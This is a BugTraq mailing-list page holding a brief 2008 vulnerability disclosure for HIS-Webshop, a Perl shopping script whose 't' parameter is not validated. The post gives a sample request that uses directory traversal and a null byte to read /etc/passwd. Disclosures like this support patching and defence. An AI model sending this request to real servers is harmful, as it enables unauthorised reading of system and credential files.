Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de) Mar 24 2008 05:02PM
zero-x linuxmail org
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de

The script doesn´t check the "t"-parameter.

Example:

http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/p
asswd%00

<< Greetz Zero X >>
...

[ more ]  




 

Privacy Statement
Copyright 2007, SecurityFocus